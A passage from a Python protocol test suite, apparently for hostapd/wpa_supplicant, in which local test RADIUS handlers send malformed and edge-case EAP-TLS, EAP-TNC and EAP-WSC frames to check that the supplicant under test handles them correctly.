return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TLS message: no Flags octet included + workaround")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS message: more data than TLS message length indicated")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start and truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_TLS, 0xe0, 1, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TLS message: no Flags octet included + workaround disabled")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; first)")
payload = 1450*'A'
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + len(payload),
EAP_TYPE_TLS, 0xc0, 65536) + payload
# "Too long TLS fragment (size over 64 kB)" on the last one
for i in range(44):
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; cont %d)" % i)
eap_proto_tls_test_wait = True
payload = 1470*'A'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_TYPE_TLS, 0x40) + payload
eap_proto_tls_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-ACK to more-fragment message")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TLS, 0x00, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tls_test_done
eap_proto_tls_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tls_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_tls_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
workaround = "0" if i == 6 else "1"
fragment_size = "100" if i == 8 else "1400"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ca.pem",
client_cert="auth_serv/user.pem",
private_key="auth_serv/user.key",
eap_workaround=workaround,
fragment_size=fragment_size,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
start = os.times()[4]
while eap_proto_tls_test_wait:
now = os.times()[4]
if now - start > 10:
break
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_tnc(dev, apdev):
"""EAP-TNC protocol tests"""
check_eap_capa(dev[0], "TNC")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = False
def tnc_handler(ctx, req):
logger.info("tnc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start with unsupported version")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC without Flags field")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TNC)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow due to missing Message Length")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0xa1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xa1, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xe1, 75001)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Start with Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xa1, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server used start flag again")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmentation and unexpected payload in ack")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x01)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x01, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and fragment overflow")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xe1, 2, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TNC, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server fragmenting and no message length in a fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TNC, 0x61, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "FOO"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start followed by invalid TNCCS-Batch (2)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "</TNCCS-Batch><TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Batch missing BatchId attribute")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch foo=3></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IF-TNCCS BatchId")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=123456789></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message end tags")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message><TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IMC-IMV-Message and TNCC-TNCS-Message Type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><IMC-IMV-Message></IMC-IMV-Message><TNCC-TNCS-Message></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message XML end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 start tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCC-TNCS-Message Base64 end tag")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>abc</TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCC-TNCS-Message Base64 message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><Base64>aGVsbG8=</Base64></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TNCC-TNCS-Message XML message")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = "<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML>hello</XML></TNCC-TNCS-Message></TNCCS-Batch>"
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing TNCCS-Recommendation type")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation foo=1></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=none")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="none"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNCCS-Recommendation type=isolate")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
logger.info("Received TNCCS-Batch: " + req[6:])
resp = '<TNCCS-Batch BatchId=2><TNCC-TNCS-Message><Type>00000001</Type><XML><TNCCS-Recommendation type="isolate"></TNCCS-Recommendation></XML></TNCC-TNCS-Message></TNCCS-Batch>'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(resp),
EAP_TYPE_TNC, 0x01) + resp
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tnc_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_tnc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
frag = 1400
if i == 8:
frag = 150
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TNC", identity="tnc", fragment_size=str(frag),
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_after_identity(dev, apdev):
"""EAP protocol tests for canned EAP-Success after identity"""
check_eap_capa(dev[0], "MD5")
def eap_canned_success_handler(ctx, req):
logger.info("eap_canned_success_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
return None
srv = start_radius_server(eap_canned_success_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_wsc(dev, apdev):
"""EAP-WSC protocol tests"""
global eap_proto_wsc_test_done, eap_proto_wsc_wait_failure
eap_proto_wsc_test_done = False
def wsc_handler(ctx, req):
logger.info("wsc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_wsc_wait_failure
eap_proto_wsc_wait_failure = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Flags field")
return struct.pack(">BBHB3BLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 1,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow (missing Message Length field)")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (> 50000)")
return struct.pack(">BBHB3BLBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 65535)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length (< current payload)")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x02, 0, 0xff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_START state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in a fragmented packet")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 10, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in fragment (expected 4)")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x01, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first fragmented packet")
return struct.pack(">BBHB3BLBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 5,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x03, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragment overflow")
return struct.pack(">BBHB3BLBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 4,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
4, 0x01, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start to start the sequence")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Op-Code 5 in WAIT_FRAG_ACK state")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
5, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid WSC Start")
return struct.pack(">BBHB3BLBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 2,
EAP_TYPE_EXPANDED, 0x00, 0x37, 0x2a, 1,
1, 0x00)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_wsc_test_done
eap_proto_wsc_test_done = True
eap_proto_wsc_wait_failure = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(wsc_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_wsc_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
fragment_size = 1398 if i != 9 else 50
dev[0].connect("eap-test", key_mgmt="WPA-EAP", eap="WSC",
fragment_size=str(fragment_size),
identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670",
scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
if eap_proto_wsc_wait_failure:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_canned_success_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Success before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000403020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_canned_failure_before_method(dev, apdev):
"""EAP protocol tests for canned EAP-Failure before any method"""
params = int_eap_server_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
phase1="allow_canned_success=1",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 0200000404020004")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_oom(dev, apdev):
"""EAP-Nak OOM"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_buildNak"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="sake user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_nak_expanded(dev, apdev):
"""EAP-Nak with expanded method"""
check_eap_capa(dev[0], "MD5")
check_eap_capa(dev[0], "VENDOR-TEST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="VENDOR-TEST WSC",
